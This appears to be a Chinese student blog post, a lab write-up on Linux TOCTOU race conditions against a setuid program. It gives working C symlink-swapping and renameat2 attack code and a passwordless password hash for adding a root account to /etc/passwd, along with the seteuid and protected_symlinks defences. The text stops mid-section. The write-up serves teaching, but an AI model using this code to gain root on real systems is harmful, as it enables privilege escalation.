<!DOCTYPE html>
<html lang="zh-Hans">
<head>

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="nich0las" />



<meta name="description" content="软件安全实验4，内核条件竞争漏洞.主要是linux下的dirty cow，toctou相关缺陷攻击">
<meta property="og:type" content="article">
<meta property="og:title" content="software-security-lab4">
<meta property="og:url" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/index.html">
<meta property="og:site_name" content="welc0me">
<meta property="og:description" content="软件安全实验4，内核条件竞争漏洞.主要是linux下的dirty cow，toctou相关缺陷攻击">
<meta property="og:locale">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220503190432999.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220503190942022.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220503225412448.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220503225423957.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220504095017959.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/race_explain.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220504141149384.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220504142821358.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220512145454981.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220505122606484.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220504143621771.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220504144152866.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220504145216100.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220504145522957.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220504145628875.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220504145917668.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220504153040487.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220504160313380.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/cow.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220504181416634.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220504181542874.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220504202325032.png">
<meta property="article:published_time" content="2022-05-04T00:27:47.000Z">
<meta property="article:modified_time" content="2023-01-19T04:57:22.000Z">
<meta property="article:author" content="nich0las">
<meta property="article:tag" content="race_condition">
<meta property="article:tag" content="software-security">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://nicholas-wei.github.io/2022/05/04/software-security-lab4/image-20220503190432999.png">

<link rel="apple-touch-icon" href= "/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="welc0me" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">



<link rel="stylesheet" href="/css/style.css">




<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>software-security-lab4 | welc0me</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: true
    }
</script>


    <script>
        yiliaConfig.jquery_ui = [true, "//cdn.bootcss.com/jqueryui/1.10.4/jquery-ui.min.js", "//cdn.bootcss.com/jqueryui/1.10.4/css/jquery-ui.min.css"];
    </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






<meta name="generator" content="Hexo 5.4.2"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/avatar.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>

        

        
            <form id="search-form">
            <input type="text" id="local-search-input" name="q" placeholder="search..." class="search form-control" autocomplete="off" autocorrect="off" searchonload="" />
            <i class="fa fa-times" onclick="resetSearch()"></i>
            </form>
            <div id="local-search-result"></div>
            <p class='no-result'>No results found <i class='fa fa-spinner fa-pulse'></i></p>
        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/DNS/" rel="tag">DNS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/FSOP/" rel="tag">FSOP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/IO-FILE/" rel="tag">IO_FILE</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/VM/" rel="tag">VM</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/angr/" rel="tag">angr</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/bash-jail/" rel="tag">bash_jail</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/botnet/" rel="tag">botnet</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/directed-fuzz/" rel="tag">directed_fuzz</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/dp/" rel="tag">dp</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/exit-hook/" rel="tag">exit_hook</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/fb-bot/" rel="tag">fb-bot</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/fmtstr/" rel="tag">fmtstr</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/fuzz/" rel="tag">fuzz</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/fuzzing101/" rel="tag">fuzzing101</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/graph/" rel="tag">graph</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/hardware/" rel="tag">hardware</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/heap/" rel="tag">heap</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ics-pa/" rel="tag">ics-pa</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/int-overflow/" rel="tag">int_overflow</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/interpreter/" rel="tag">interpreter</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/iot/" rel="tag">iot</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/kernel/" rel="tag">kernel</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/llvm/" rel="tag">llvm</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/matlab/" rel="tag">matlab</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/maze/" rel="tag">maze</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/meltdown/" rel="tag">meltdown</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwnable-tw/" rel="tag">pwnable.tw</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pyjail/" rel="tag">pyjail</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/race-condition/" rel="tag">race_condition</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ransomeware/" rel="tag">ransomeware</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/router/" rel="tag">router</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/shellcode/" rel="tag">shellcode</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/software-security/" rel="tag">software-security</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/stack/" rel="tag">stack</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/tcp/" rel="tag">tcp</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/tree/" rel="tag">tree</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wasm/" rel="tag">wasm</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wechat/" rel="tag">wechat</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wp/" rel="tag">wp</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="http://moxfive.xyz/">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">勤能补拙是良训</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/avatar.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>
</nav>
      <div class="body-wrap"><article id="post-software-security-lab4" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2022/05/04/software-security-lab4/" class="article-date">
      <time datetime="2022-05-04T00:27:47.000Z" itemprop="datePublished">2022-05-04</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      software-security-lab4
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/school/">school</a>
    </div>


        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/race-condition/" rel="tag">race_condition</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/software-security/" rel="tag">software-security</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>软件安全实验4，内核条件竞争漏洞.主要是linux下的dirty cow，toctou相关缺陷攻击</p>
<span id="more"></span>

<h1 id="race-condition"><a href="#race-condition" class="headerlink" title="race_condition"></a>race_condition</h1><h2 id="task1"><a href="#task1" class="headerlink" title="task1"></a>task1</h2><p>这里提到了一个特殊的密码<code>U6aMy0wojraho</code>。当我们在/etc/passwd中设置用户密码为这个时，可以直接enter登录，不需要填写。</p>
<p>发现写入到/etc/passwd之后确实可以不用输入密码登录</p>
<p><img src="/2022/05/04/software-security-lab4/image-20220503190432999.png" alt="image-20220503190432999"></p>
<p><img src="/2022/05/04/software-security-lab4/image-20220503190942022.png" alt="image-20220503190942022"></p>
<p>确实非常神奇。</p>
<h2 id="task2"><a href="#task2" class="headerlink" title="task2"></a>task2</h2><p>在做实验之前，我们首先关掉两个保护。一是防止用户把自己的符号链接链接到其他用户的文件上，二是防止root写用户的文件。因为一般用户的文件都是用户自己维护的，root一般能修改的都是系统的文件。</p>
<blockquote>
<p>chmod 4755的作用</p>
<p>和chmod 755的区别在于：前面的4确保我们在以seed的身份执行此文件时，具有与所有着相当的权限。后续我们设置chown root也就是把所有者设置为root。</p>
</blockquote>
<h3 id="etc-passwd格式"><a href="#etc-passwd格式" class="headerlink" title="/etc/passwd格式"></a>/etc/passwd格式</h3><p>我们看一个典型的/etc/passwd文件。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root:x:0:0:root:/root:/bin/bash</span><br></pre></td></tr></table></figure>

<p>这里第一位是<code>root</code>，表示用户名称。</p>
<p>第二位是x。表示密码在/etc/shadow中。而其实/etc/shadow中存放的是hash过的用户密码。如果这里写入的不是x，也可以直接写入密码。这样OS就会在登陆的时候直接找这里的密码。</p>
<p>第三位是用户标识号。如果设置为0表示用户具有root权限。</p>
<p>第四个是用户组ID。一般只需要知道上述四个即可。</p>
<h3 id="task2-A"><a href="#task2-A" class="headerlink" title="task2.A"></a>task2.A</h3><p>这里程序中间暂停了10秒，在这段时间内我们可以将<code>/tmp/XYZ</code>修改成<code>/etc/passwd</code>即可。</p>
<p>原理：我们首先检查access文件是否可达的时候，看到的是<strong>谁运行的此文件(uid)<strong>，因此如果我们想要写入/etc/passwd，此处以seed的身份无法通过<code>access</code>的检查。</strong>但是<code>fopen()</code>检查的是当前可执行文件的拥有者是否有对目标文件写入的权限(euid)<strong>。因此，我们用fopen打开<code>/etc/passwd</code>时，</strong>是可以写入的</strong>。尤其是当我们用chmod 4755之后，始终可以使用fopen打开/etc/passwd。</p>
<p>于是我们要做的，就是在vlup进行sleep的同时，调用下面的函数，将/tmp/XYZ软连接到/etc/passwd即可。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    unlink(<span class="string">&quot;/tmp/XYZ&quot;</span>);</span><br><span class="line">    symlink(<span class="string">&quot;/etc/passwd&quot;</span>,<span class="string">&quot;/tmp/XYZ&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>成功截图如下所示。我们就把上面那个特殊的密码写入了<code>/etc/passwd</code>之后就可以直接root。注意要先创建一个<code>/tmp/XYZ</code>，并且把对应权限改为777。(pdf里面写的)</p>
<p><img src="/2022/05/04/software-security-lab4/image-20220503225412448.png" alt="image-20220503225412448"></p>
<p><img src="/2022/05/04/software-security-lab4/image-20220503225423957.png" alt="image-20220503225423957"></p>
<h3 id="task2-B"><a href="#task2-B" class="headerlink" title="task2.B"></a>task2.B</h3><p>​    我们编写如下程序。首先把<code>/tmp/XYZ</code>改到<code>/dev/null</code>，这是为了通过<code>access()</code>的检查，其次usleep一段时间是为了防止竞争条件变化太快，最后把<code>/tmp/XYZ</code>链接到/etc/passwd是为了通过条件竞争获取写的可能性。</p>
<p>我们如果想要成功，必须先<code>unlink</code>到<code>/dev/null</code>接着通过<code>vulp</code>的<code>access</code>。之后回到本文件的unlink到/etc/passwd，最后再回到vulp。可以看出条件竞争还是很苛刻的。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#include &lt;stdio.h&gt;</span></span><br><span class="line"><span class="comment">#include &lt;stdlib.h&gt;</span></span><br><span class="line"><span class="comment">#include &lt;string.h&gt;</span></span><br><span class="line"><span class="comment">#include &lt;unistd.h&gt;</span></span><br><span class="line"><span class="built_in">int</span> main()</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">while</span>(<span class="number">1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        unlink(<span class="string">&quot;/tmp/XYZ&quot;</span>);</span><br><span class="line">        symlink(<span class="string">&quot;/dev/null&quot;</span>,<span class="string">&quot;/tmp/XYZ&quot;</span>);</span><br><span class="line">        usleep(<span class="number">200</span>);</span><br><span class="line"></span><br><span class="line">        unlink(<span class="string">&quot;/tmp/XYZ&quot;</span>);</span><br><span class="line">        symlink(<span class="string">&quot;/etc/passwd&quot;</span>,<span class="string">&quot;/tmp/XYZ&quot;</span>);</span><br><span class="line">        usleep(<span class="number">200</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>将上述程序编译，之后确保<code>/tmp/ABC</code>文件存在并且拥有者为<code>seed</code>。首先运行上述.c文件编译的<code>attack</code>文件，接着运行<code>target_process.sh</code>。但是尝试了好久也没有成功。期间查看<code>tmp/XYZ</code>文件类型，发现已经被改为<code>root</code>拥有。这样将一直无法通过access检查。</p>
<p><img src="/2022/05/04/software-security-lab4/image-20220504095017959.png" alt="image-20220504095017959"></p>
<blockquote>
<p>思考：看到上面文件大小很大，说明我们已经成功写入了这个文件。说明vulp肯定通过了access的检查。但是注意access只是检查调用者的身份。这里可能会有疑问: 调用者是seed，但是/tmp/XYZ是root拥有的，为什么还能通过access的检验? 做了相关试验后发现，<strong>access通过只需要文件用户组ID和调用者ID对的上即可通过</strong>。在这里我们以seed身份运行程序，而/tmp/XYZ也是属于用户组seed的(从上面这张图可以看出)，<strong>因此本来就可以写入</strong>。</p>
</blockquote>
<h3 id="task2-C"><a href="#task2-C" class="headerlink" title="task2.C"></a>task2.C</h3><p>这里解释了为什么之前我们的攻击不会成功。因为<code>/tmp</code>文件夹有粘滞性质，只有符号链接的拥有者才可以修改文件，即使文件是所有人都可以写的。</p>
<p>作者给出了一个改进方案，就是使用一个原子操作来删掉现有的符号链接(也就是unlink)并且把它换成一个新的符号链接(因为这牵涉到两个不同的系统调用)。之前错误发生的原因是，如果在unlink之后，程序被切换成了<code>vulp</code>，那么<code>fopen</code>就会创造一个和自己用户组一样的文件，也就是输入<code>root</code>的<code>/tmp/XYZ</code>。所以造成了之前的问题。</p>
<p>那么我们只需要一个原子操作，把Unlink和symlink放在同一时刻执行即可。使用<code>renameat2</code>系统调用可以原子性的交换他们。注意到我们先把<code>/tmp/ABC</code>符号链接到<code>/etc/passwd</code>，之后尝试交换/tmp/XYZ和/tmp/ABC的路径即可。</p>
<p>总结一下上述攻击流程，如下图所示。右边是三种攻击流程，包括了成功，一般的失败情况，和为什么会创建一个root的文件。</p>
<p><img src="/2022/05/04/software-security-lab4/race_explain.png" alt="race_explain"></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> _GNU_SOURCE</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> flags = RENAME_EXCHANGE;</span><br><span class="line">    renameat2(<span class="number">0</span>,<span class="string">&quot;/tmp/ABC&quot;</span>,<span class="number">0</span>,<span class="string">&quot;/etc/passwd&quot;</span>,flags);</span><br><span class="line">    <span class="keyword">while</span>(<span class="number">1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        renameat2(<span class="number">0</span>,<span class="string">&quot;/tmp/XYZ&quot;</span>,<span class="number">0</span>,<span class="string">&quot;/dev/null&quot;</span>,flags);</span><br><span class="line">        renameat2(<span class="number">0</span>,<span class="string">&quot;/tmp/XYZ&quot;</span>,<span class="number">0</span>,<span class="string">&quot;/tmp/ABC&quot;</span>,flags);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/2022/05/04/software-security-lab4/image-20220504141149384.png" alt="image-20220504141149384"></p>
<p><img src="/2022/05/04/software-security-lab4/image-20220504142821358.png" alt="image-20220504142821358"></p>
<p>关于为什么fd参数为0的解释。</p>
<p><img src="/2022/05/04/software-security-lab4/image-20220512145454981.png" alt="image-20220512145454981"></p>
<p>这里是成功的截图。</p>
<p><img src="/2022/05/04/software-security-lab4/image-20220505122606484.png" alt="image-20220505122606484"></p>
<p>之后测试sudo test可以得到正确的结果。</p>
<p><img src="/2022/05/04/software-security-lab4/image-20220504143621771.png" alt="image-20220504143621771"></p>
<h2 id="task3-a"><a href="#task3-a" class="headerlink" title="task3.a"></a>task3.a</h2><p>这里要求我们使用<code>seteuid</code>来限制用户的权限。</p>
<p><img src="/2022/05/04/software-security-lab4/image-20220504144152866.png" alt="image-20220504144152866"></p>
<p>如果在程序执行一开始调用seteuid，我们的effective userID将被设置为和read <code>uid</code>一样的内容，而uid即为执行程序的人拥有的权限。这里就是seed。因此在<code>fopen</code>时，进程检查我们的effective userID时，就会发现并不是root，从而失去对/etc/passwd写入的能力，从而完成了防御。同时，也不需要用access来做检查了。</p>
<p>我们把vulp改成如下所示的内容。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">uid_t</span> real_uid = getuid(); <span class="comment">// real uid</span></span><br><span class="line">    <span class="type">uid_t</span> eff_uid = geteuid(); <span class="comment">// effective user id</span></span><br><span class="line">    seteuid(real_uid); <span class="comment">// set it to the real uid</span></span><br><span class="line">    <span class="type">char</span>* fn = <span class="string">&quot;/tmp/XYZ&quot;</span>;</span><br><span class="line">    <span class="type">char</span> buffer[<span class="number">60</span>];</span><br><span class="line">    FILE* fp;</span><br><span class="line">    <span class="comment">/* get user input */</span></span><br><span class="line">    <span class="built_in">scanf</span>(<span class="string">&quot;%50s&quot;</span>, buffer);</span><br><span class="line">    <span class="keyword">if</span> (!access(fn, W_OK)) &#123;</span><br><span class="line">        <span class="comment">//sleep(10);</span></span><br><span class="line">        fp = fopen(fn, <span class="string">&quot;a+&quot;</span>);</span><br><span class="line">        <span class="keyword">if</span> (!fp) &#123;</span><br><span class="line">            perror(<span class="string">&quot;Open failed&quot;</span>);</span><br><span class="line">            <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        fwrite(<span class="string">&quot;\n&quot;</span>, <span class="keyword">sizeof</span>(<span class="type">char</span>), <span class="number">1</span>, fp);</span><br><span class="line">        fwrite(buffer, <span class="keyword">sizeof</span>(<span class="type">char</span>), <span class="built_in">strlen</span>(buffer), fp);</span><br><span class="line">        fclose(fp);</span><br><span class="line">        seteuid(eff_uid); <span class="comment">// set back effective user id </span></span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;No permission \n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>发现即使有的时候能够执行到open语句，也无法成功了。即使我们程序依然是4755权限。因为此时我们在打开文件时，权限已经被改为用户(执行者)的，无法修改/etc/passwd。</p>
<p><img src="/2022/05/04/software-security-lab4/image-20220504145216100.png" alt="image-20220504145216100"></p>
<h2 id="task3-b"><a href="#task3-b" class="headerlink" title="task3.b"></a>task3.b</h2><p>同样的，尝试使用pdf里面给出的。下面这条命令开启了对于符号链接的保护。也就是说我们不能对有粘滞bit的文件夹中的符号链接做解引用。</p>
<p><img src="/2022/05/04/software-security-lab4/image-20220504145522957.png" alt="image-20220504145522957"></p>
<p>运行之前没有setuid的程序，发现也无法成功了。</p>
<p><img src="/2022/05/04/software-security-lab4/image-20220504145628875.png" alt="image-20220504145628875"></p>
<p>这样的原因可以见<a target="_blank" rel="noopener" href="https://www.kernel.org/doc/Documentation/sysctl/fs.txt">网站</a></p>
<p><img src="/2022/05/04/software-security-lab4/image-20220504145917668.png" alt="image-20220504145917668"></p>
<p>这里设置为1之后，就相当于”sticky world-writable”的符号链接文件不允许我们follow，也就是无法通过/tmp文件夹中的文件进入别的地方，只有当符号链接的uid和想要通过这个符号链接访问别的东西的人的uid是一样的时候才行。</p>
<p>这样相当于我们在/tmp文件夹下的所有符号链接都设置了一个seteuid，确保了访问符号链接的用户一定和真实用户是一致的。</p>
<p><strong>在本练习中</strong>，漏洞程序是root身份，/tmp的拥有者也是root，但是符号链接的创建者是seed。这就使得上述保护激活，从而不允许root的进程使用符号链接。</p>
<p><strong>局限性</strong>：</p>
